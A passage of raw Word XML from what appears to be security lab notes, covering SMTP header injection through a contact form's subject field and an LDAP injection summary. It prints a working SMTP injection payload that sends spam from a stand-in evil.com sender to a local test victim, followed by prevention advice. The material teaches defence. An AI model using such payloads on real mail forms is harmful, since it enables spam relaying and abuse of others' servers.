          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CBE5B4" w14:textId="4B52AEB4" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r>
        <w:t>Step2: (Goal: SMTP injection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAEB50" w14:textId="542DFA83" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r>
        <w:t>In subject section I just pasted this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F446048" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2E8379" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C768037" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>MAIL FROM:spam@evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29218DDB" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>RCPT TO:victim@local.test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074BD62A" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>DATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0363C74D" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>From: spam@evil.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E197BC" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>To: victim@local.test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A86DB11" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>Subject: FREE MONEY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EF7DE" w14:textId="77777777" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>Click now!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB6FA04" w14:textId="41C7A736" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="0008176C">
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6228EF23" w14:textId="06309D31" w:rsidR="0008176C" w:rsidRDefault="0008176C" w:rsidP="00392B91">
      <w:r w:rsidRPr="0008176C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="120B26B6" wp14:editId="160829B9">
            <wp:extent cx="5731510" cy="2075180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="105922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22146" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2075180"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08631FE9" w14:textId="77777777" w:rsidR="00BD6969" w:rsidRPr="00BD6969" w:rsidRDefault="00BD6969" w:rsidP="00BD6969">
      <w:r w:rsidRPr="00BD6969">
        <w:t>In the SMTP server window, you’ll see:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCBDA86" w14:textId="2FB81BAB" w:rsidR="00BD6969" w:rsidRPr="00BD6969" w:rsidRDefault="00BD6969" w:rsidP="00BD6969">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD6969">
        <w:t>One normal support email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B3F50" w14:textId="35E2FF72" w:rsidR="00BD6969" w:rsidRPr="00BD6969" w:rsidRDefault="00BD6969" w:rsidP="00BD6969">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="108"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD6969">
        <w:t>A second injected email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10330E9D" w14:textId="77777777" w:rsidR="00BD6969" w:rsidRDefault="00BD6969" w:rsidP="00392B91"/>
    <w:p w14:paraId="74B9A7C5" w14:textId="241E6253" w:rsidR="007A2D4C" w:rsidRPr="007A2D4C" w:rsidRDefault="007A2D4C" w:rsidP="00392B91">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2D4C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Preventing SMTP Injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B16A09" w14:textId="2AF1F3ED" w:rsidR="007A2D4C" w:rsidRPr="007A2D4C" w:rsidRDefault="007A2D4C" w:rsidP="007A2D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A2D4C">
        <w:t>SMTP injection occurs when applications trust user input, allowing it to be interpreted as SMTP commands instead of plain data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763D8B4C" w14:textId="7BA8DE00" w:rsidR="007A2D4C" w:rsidRPr="007A2D4C" w:rsidRDefault="007A2D4C" w:rsidP="007A2D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A2D4C">
        <w:t>Email address fields must be strictly validated, using a tight pattern that rejects newline characters and any extra headers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3215CD02" w14:textId="6D057702" w:rsidR="007A2D4C" w:rsidRPr="007A2D4C" w:rsidRDefault="007A2D4C" w:rsidP="007A2D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A2D4C">
        <w:t>Email subjects must be single-line and length-limited, since newlines allow attackers to break headers and inject SMTP commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09669CDF" w14:textId="19F1342B" w:rsidR="007A2D4C" w:rsidRPr="007A2D4C" w:rsidRDefault="007A2D4C" w:rsidP="007A2D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A2D4C">
        <w:t>Message bodies must not allow a line containing only a single dot (.), as this terminates the SMTP DATA section and enables command injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409CD401" w14:textId="5D6DCD59" w:rsidR="007A2D4C" w:rsidRPr="007A2D4C" w:rsidRDefault="007A2D4C" w:rsidP="007A2D4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="105"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="007A2D4C">
        <w:t>The safest real-world defense is to avoid manual SMTP handling and use well-tested mail libraries that automatically escape input and prevent injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B9672" w14:textId="77777777" w:rsidR="007A2D4C" w:rsidRDefault="007A2D4C" w:rsidP="00392B91"/>
    <w:p w14:paraId="00F12F10" w14:textId="281FEEDE" w:rsidR="009A7004" w:rsidRPr="00917FD1" w:rsidRDefault="009A7004" w:rsidP="009A7004">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00051263">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Injecting into </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>LDAP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6EAEC9" w14:textId="1E77596F" w:rsidR="00191A77" w:rsidRPr="00191A77" w:rsidRDefault="00191A77" w:rsidP="00191A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00191A77">
        <w:t>LDAP injection occurs when unvalidated user input is embedded directly into LDAP queries, allowing attackers to alter search filters or returned attributes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77345FB5" w14:textId="5AF09ECE" w:rsidR="00191A77" w:rsidRPr="00191A77" w:rsidRDefault="00191A77" w:rsidP="00191A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00191A77">
        <w:t>Attackers can inject wildcard characters (*) and closing brackets ()) to expand searches, bypass restrictions, or retrieve all directory entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48AB59" w14:textId="16081A39" w:rsidR="00191A77" w:rsidRPr="00191A77" w:rsidRDefault="00191A77" w:rsidP="00191A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00191A77">
        <w:t>LDAP query attributes can be manipulated to return sensitive fields such as email addresses, departments, and other user data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E25445" w14:textId="2464A0EF" w:rsidR="00191A77" w:rsidRPr="00191A77" w:rsidRDefault="00191A77" w:rsidP="00191A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00191A77">
        <w:t>LDAP injection flaws are identified through abnormal search results or server errors, often by testing wildcards, excess brackets, and injected attribute names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C793DD" w14:textId="602A00A3" w:rsidR="00191A77" w:rsidRPr="00191A77" w:rsidRDefault="00191A77" w:rsidP="00191A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="110"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00191A77">
        <w:t>Prevention requires strict allow-list validation, permitting only alphanumeric characters and rejecting LDAP meta-characters such as ( ) ; , * | &amp; =.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A560455" w14:textId="77777777" w:rsidR="009A7004" w:rsidRDefault="009A7004" w:rsidP="00392B91"/>
    <w:p w14:paraId="69B26EF0" w14:textId="10C64C84" w:rsidR="003C6FC8" w:rsidRPr="009205C6" w:rsidRDefault="003C6FC8" w:rsidP="003C6FC8">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>--The End--</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="003C6FC8" w:rsidRPr="009205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371F8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="159EADD6"/>
    <w:lvl w:ilvl="0" w:tplc="1FE4E9CC">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7CA6EF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1960D7A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9251438"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA84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D3C37"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7328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8736F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6370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4770E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="585C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D540E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF76A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F0D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="577A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0268E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BC4A1A9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E6F5F9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB4CD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362C13"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F24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B4C7F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E286B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496500"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C0FC0F58"/>
    <w:lvl w:ilvl="0" w:tplc="1FE4E9C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E67096"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="ED30C8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7704B7D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F24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6040AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="89DC2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E63A18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E550F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CB21CCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2F308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CF76AEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BF0E2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4E6E6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10026F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0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1DF612AA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85EC42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1E5D7AC5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="72C0B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82282F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="985693E6"/>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23F643E7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="65946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5F02362"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="48B4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553A14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C42C59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269F4FB3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F24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D07FF9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F24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614D63"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="06F0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216CC5"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA84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8A2585"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="246246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2AAD62DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="18747DA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2BB860BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01D6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8E6A06"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E52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5A79AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CA2C73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E5C2C62"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CB5E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A53AD8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76C0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623DDD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ED887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31EE380A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0EF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DC6816"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9FB69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4696DB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="52807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52D2C6F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D8B6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B25826"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAC8B61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393023A3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7D8565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399C588A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDAA7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9A11461"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E3AA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EF172E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EC7AB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BD514D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="444A44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3FBE1A9E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2447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45942D4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7B81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472194C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B3CCF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47053E16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4222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59670B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DF36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802E0B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3C3C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843642"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="60A65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B721080"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E56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511667"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37D2EC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4D463EE1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="193E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A27D1A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="479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B56D38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DAE4084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4E8D45DF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A665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E957D6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="392489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ED7622B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9A1C9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F6E6DD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8A8E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B32B55"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BA248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51457FC3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7D07912"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="40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52303A41"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEA82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764891"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE96E0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52F258DF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="501C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FF5854"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="88CC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2715D9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6902D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56041228"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="63588C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57506EBB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE2832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577B5E38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91CA769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5928157D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1F6CAC8"/>
    <w:lvl w:ilvl="0" w:tplc="40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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5AB34CD0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1F16D7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5B047458"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="559A8F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5BB90335"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="606EE7F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5CC96258"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0E728E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5D710509"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3B6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0F3D90"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="144C0C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608233C0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EF8C6F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0CA006B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C3A49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623377C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="01D6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CC64EB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="999ED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44037CA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1322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55F27DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="00622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6040246"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AAECD0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8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="66495358"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3BEC22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68320800"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F24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046D3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BE2E7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A620D5C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5DB8F8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6A94762D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CA84E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B33497"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="735A9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E503F59"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0182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EB85228"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78D872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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="71AF0E1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="390A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807491"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="50B6BD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74082167"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B7D4B774"/>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74AF373E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="22FEC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56212A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1184776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78FF2A03"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE964E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791869E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="131A3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C0D4B47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CA4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B756EA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F24B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D102778"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="39BE9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EF12BA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BA0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F4F5885"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="38F20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F9B2F27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6914A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FAC3991"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5444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6769522">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="411435468">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1127777">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1219052096">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1661880907">
    <w:abstractNumId w:val="90"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1020664849">
    <w:abstractNumId w:val="107"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="795180748">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="2110077988">
    <w:abstractNumId w:val="52"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1684621839">
    <w:abstractNumId w:val="101"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="602764762">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="995308038">
    <w:abstractNumId w:val="103"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="2089643940">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1459106840">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="798500445">
    <w:abstractNumId w:val="92"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="118499763">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="2118258372">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1455098768">
    <w:abstractNumId w:val="54"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1264846540">
    <w:abstractNumId w:val="87"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1619947685">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="761494406">
    <w:abstractNumId w:val="106"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1413237097">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="969019648">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1334069593">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1284340134">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="217934323">
    <w:abstractNumId w:val="61"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="828405767">
    <w:abstractNumId w:val="100"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="695499765">
    <w:abstractNumId w:val="68"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1568298849">
    <w:abstractNumId w:val="86"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="954019148">
    <w:abstractNumId w:val="99"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1771852109">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="845638018">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1560432939">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1167750859">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1445928356">
    <w:abstractNumId w:val="64"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1477069325">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1838425203">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="2004578199">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1640308592">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1748914132">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1903833516">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="1059784696">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1796943823">
    <w:abstractNumId w:val="83"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="1374846670">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="24838286">
    <w:abstractNumId w:val="97"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="2086803882">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="124277236">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="2050296151">
    <w:abstractNumId w:val="1"/>
  </w:num>
